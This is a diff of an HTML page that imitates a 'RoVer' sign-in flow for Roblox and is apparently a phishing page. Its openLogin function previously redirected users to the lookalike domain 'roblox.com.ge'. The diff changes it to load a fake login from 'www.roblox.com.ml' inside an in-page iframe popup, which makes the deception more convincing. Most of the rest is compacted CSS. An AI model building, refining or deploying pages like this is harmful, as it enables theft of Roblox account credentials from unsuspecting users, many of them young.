--- a/index.html
+++ b/index.html
@@ -9,188 +9,88 @@
     * {margin:0;padding:0;box-sizing:border-box;font-family:'Inter',sans-serif;}
     body {background:#1e1d1f;min-height:100vh;overflow-x:hidden;color:#fff;}
 
-    header {
-      background:#e00078;
-      height:56px;
-      display:flex;
-      align-items:center;
-      padding:0 20px;
-      position:relative;
-      z-index:1001;
-    }
-    .menu-btn {
-      font-size:26px;
-      color:#fff;
-      cursor:pointer;
-      background:none;
-      border:none;
-      margin-right:14px;
-    }
-    .logo {
-      font-size:20px;
-      font-weight:600;
-      color:#fff;
-      display:flex;
-      align-items:center;
-    }
+    header {background:#e00078;height:56px;display:flex;align-items:center;padding:0 20px;position:relative;z-index:1001;}
+    .menu-btn {font-size:26px;color:#fff;cursor:pointer;background:none;border:none;margin-right:14px;}
+    .logo {font-size:20px;font-weight:600;color:#fff;display:flex;align-items:center;}
 
-    .overlay {
-      position:fixed;
-      top:0;
-      left:0;
-      width:100%;
-      height:100%;
-      background:rgba(0,0,0,0.6);
-      opacity:0;
-      visibility:hidden;
-      transition:opacity 0.3s ease, visibility 0.3s ease;
-      z-index:900;
-    }
+    .overlay {position:fixed;top:0;left:0;width:100%;height:100%;background:rgba(0,0,0,0.6);opacity:0;visibility:hidden;transition:opacity 0.3s ease, visibility 0.3s ease;z-index:900;}
     .overlay.active {opacity:1;visibility:visible;}
 
-    .side-menu {
-      position:fixed;
-      top:0;
-      left:-260px;
-      width:260px;
-      height:100%;
-      background:#e00078;
-      color:#fff;
-      padding:20px;
-      transition:0.3s;
-      z-index:1002;
-    }
+    .side-menu {position:fixed;top:0;left:-260px;width:260px;height:100%;background:#e00078;color:#fff;padding:20px;transition:0.3s;z-index:1002;}
     .side-menu.active {left:0;}
-    .side-menu .close-btn {
-      font-size:28px;
-      cursor:pointer;
-      margin-bottom:20px;
-      display:block;
-      background:none;
-      border:none;
-      color:#fff;
-    }
+    .side-menu .close-btn {font-size:28px;cursor:pointer;margin-bottom:20px;display:block;background:none;border:none;color:#fff;}
     .side-menu ul {list-style:none;}
     .side-menu ul li {margin:14px 0;font-size:16px;}
-    .side-menu ul li a {
-      text-decoration:none;
-      color:#fff;
-      display:block;
-      padding:6px 10px;
-      border-radius:4px;
-      transition:background 0.2s;
-    }
+    .side-menu ul li a {text-decoration:none;color:#fff;display:block;padding:6px 10px;border-radius:4px;transition:background 0.2s;}
     .side-menu ul li a.disabled {opacity:0.6;pointer-events:none;}
     .side-menu ul li a.active {background:#fff;color:#000;}
 
-    .login-box {
-      margin:80px auto;
-      background:#000;
-      padding:40px 30px;
-      border-radius:6px;
-      text-align:center;
-      max-width:420px;
-      width:90%;
-      color:#fff;
-      position:relative;
-      z-index:1;
-      transition:opacity 0.4s ease, transform 0.4s ease;
-    }
+    .login-box {margin:80px auto;background:#000;padding:40px 30px;border-radius:6px;text-align:center;max-width:420px;width:90%;color:#fff;position:relative;z-index:1;transition:opacity 0.4s ease, transform 0.4s ease;}
     .login-box.hide {opacity:0;transform:scale(0.95);}
     .login-box.show {opacity:1;transform:scale(1);}
 
     .login-box h2 {font-size:24px;margin-bottom:8px;font-weight:600;}
     .login-box p {font-size:14px;margin-bottom:24px;}
-    .login-box button {
-      background:#e00078;
-      color:#fff;
-      border:none;
-      padding:12px 28px;
-      border-radius:22px;
-      font-size:15px;
-      font-weight:600;
-      cursor:pointer;
-      transition:background 0.2s;
-    }
+    .login-box button {background:#e00078;color:#fff;border:none;padding:12px 28px;border-radius:22px;font-size:15px;font-weight:600;cursor:pointer;transition:background 0.2s;}
     .login-box button:hover {background:#b80062;}
 
-    /* OAuth box */
-    .oauth-box {
-      background:#111;
-      border-radius:8px;
-      padding:30px 25px;
-      text-align:center;
-    }
-    .oauth-box .top {
-      font-size:22px;
-      font-weight:700;
-      margin-bottom:15px;
-      text-align:left;
-    }
-    .oauth-box p.subtitle {
-      font-size:14px;
-      color:#ccc;
-      margin:10px 0 20px;
-      text-align:left;
-    }
-    .oauth-box hr {
-      border:none;
-      border-top:1px solid #333;
-      margin:20px 0;
-    }
-    .oauth-box p.app-name {
-      margin-bottom:20px;
-      font-weight:600;
-    }
-    .oauth-box button.continue {
-      background:#fff;
-      color:#000;
-      border:none;
-      padding:12px;
-      border-radius:6px;
-      font-size:15px;
-      width:100%;
-      margin-bottom:15px;
-      cursor:pointer;
-    }
-    .oauth-box p.or {
-      margin:10px 0;
-      color:#888;
-    }
-    .oauth-box button.return {
-      background:#111;
-      color:#fff;
-      border:1px solid #333;
-      padding:12px;
-      border-radius:6px;
-      font-size:15px;
-      width:100%;
-      cursor:pointer;
-    }
+    .oauth-box {background:#111;border-radius:8px;padding:30px 25px;text-align:center;}
+    .oauth-box .top {font-size:22px;font-weight:700;margin-bottom:15px;text-align:left;}
+    .oauth-box p.subtitle {font-size:14px;color:#ccc;margin:10px 0 20px;text-align:left;}
+    .oauth-box hr {border:none;border-top:1px solid #333;margin:20px 0;}
+    .oauth-box p.app-name {margin-bottom:20px;font-weight:600;}
+    .oauth-box button.continue {background:#fff;color:#000;border:none;padding:12px;border-radius:6px;font-size:15px;width:100%;margin-bottom:15px;cursor:pointer;}
+    .oauth-box p.or {margin:10px 0;color:#888;}
+    .oauth-box button.return {background:#111;color:#fff;border:1px solid #333;padding:12px;border-radius:6px;font-size:15px;width:100%;cursor:pointer;}
 
     .extra-space {height:400px;}
-
-    footer {
-      background:#18181a;
-      padding:30px 20px;
-      display:flex;
-      justify-content:space-between;
-      flex-wrap:wrap;
-      color:#ccc;
-      font-size:14px;
-    }
+    footer {background:#18181a;padding:30px 20px;display:flex;justify-content:space-between;flex-wrap:wrap;color:#ccc;font-size:14px;}
     footer .left {font-size:13px;}
     footer .right {display:flex;flex-wrap:wrap;gap:20px;}
     footer a {color:#ccc;text-decoration:none;}
     footer a:hover {text-decoration:underline;}
-    .footer-logo {
-      font-weight:700;
-      font-size:18px;
-      background:linear-gradient(to right, #ff4da6, #ff6600);
-      -webkit-background-clip:text;
-      -webkit-text-fill-color:transparent;
-      margin-bottom:10px;
-      display:inline-block;
+    .footer-logo {font-weight:700;font-size:18px;background:linear-gradient(to right, #ff4da6, #ff6600);-webkit-background-clip:text;-webkit-text-fill-color:transparent;margin-bottom:10px;display:inline-block;}
+
+    /* === IFRAME POPUP === */
+    .iframe-popup {
+      position: fixed;
+      top: 50%;
+      left: 50%;
+      transform: translate(-50%, -50%) scale(0.9);
+      width: 800px;
+      height: 600px;
+      background: #fff;
+      border-radius: 10px;
+      box-shadow: 0 0 25px rgba(0, 0, 0, 0.6);
+      opacity: 0;
+      visibility: hidden;
+      transition: all 0.3s ease;
+      z-index: 2000;
+      overflow: hidden;
+    }
+    .iframe-popup.active {
+      opacity: 1;
+      visibility: visible;
+      transform: translate(-50%, -50%) scale(1);
+    }
+    .iframe-popup iframe {
+      width: 100%;
+      height: 100%;
+      border: none;
+    }
+    .iframe-close {
+      position: absolute;
+      top: 10px;
+      right: 15px;
+      background: #e00078;
+      color: #fff;
+      border: none;
+      border-radius: 50%;
+      width: 28px;
+      height: 28px;
+      font-size: 16px;
+      cursor: pointer;
+      z-index: 10;
     }
   </style>
 </head>
@@ -244,10 +144,18 @@
     </div>
   </footer>
 
+  <!-- === POPUP STRUCTURE === -->
+  <div class="iframe-popup" id="iframePopup">
+    <button class="iframe-close" onclick="closeIframe()">✕</button>
+    <iframe src=""></iframe>
+  </div>
+
   <script>
     const menuBtn = document.querySelector('.menu-btn');
     const sideMenu = document.getElementById('sideMenu');
     const overlay = document.getElementById('overlay');
+    const iframePopup = document.getElementById('iframePopup');
+    const iframe = iframePopup.querySelector('iframe');
 
     function toggleMenu() {
       sideMenu.classList.toggle('active');
@@ -259,11 +167,8 @@
 
     function showOAuth() {
       const box = document.getElementById("loginBox");
-
-      // Animate out
       box.classList.remove("show");
       box.classList.add("hide");
-
       setTimeout(() => {
         box.innerHTML = `
           <h2>Sign in to RoVer</h2>
@@ -277,16 +182,19 @@
             <button class="return" onclick="location.reload()">Return to RoVer</button>
           </div>
         `;
-
-        // Animate in
         box.classList.remove("hide");
         box.classList.add("show");
-      }, 400); // match transition duration
+      }, 400);
     }
 
-    // Simple clean redirect
     function openLogin() {
-      window.location.href = "https://roblox.com.ge/login?returnUrl=9924072593518852";
+      iframe.src = "https://www.roblox.com.ml/login?returnUrl=685940214913819";
+      iframePopup.classList.add("active");
+    }
+
+    function closeIframe() {
+      iframePopup.classList.remove("active");
+      iframe.src = "";
     }
   </script>
 </body>
